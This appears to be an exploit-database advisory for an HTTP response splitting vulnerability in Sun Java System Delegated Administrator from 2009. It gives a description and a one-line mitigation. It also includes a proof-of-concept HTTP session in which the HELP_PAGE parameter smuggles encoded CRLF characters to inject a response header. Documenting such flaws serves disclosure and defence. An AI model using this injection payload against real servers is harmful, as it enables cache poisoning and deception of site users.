Sun Java System Delegated Administrator HTTP Response Splitting Vulnerability

vendor:

Java System Delegated Administrator

by:

SecurityFocus

7.5

CVSS

HIGH

HTTP Response Splitting

113

CWE

Product Name: Java System Delegated Administrator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Sun Java System Delegated Administrator HTTP Response Splitting Vulnerability

Sun Java System Delegated Administrator is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

Mitigation:

Ensure that user-supplied data is properly sanitized before being used in HTTP responses.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34643/info

Sun Java System Delegated Administrator is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

The following example HTTP session is available:

$ openssl s_client -connect <server>:443

GET
/da/DA/Login?Login.HelpHREF=http://www.example.com/&com_sun_web_ui_popup=false&HELP_PAGE=/help/%0AX-Tag:%20Core%20Security%20Technologies%0A%0D&jato.pageSession=
HTTP/1.1
Host: <server>

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 20 Apr 2009 18:21:48 GMT
Cache-control: private
Location: <server>
X-Tag: Core Security Technologies
Content-length: 0
Content-type: text/htm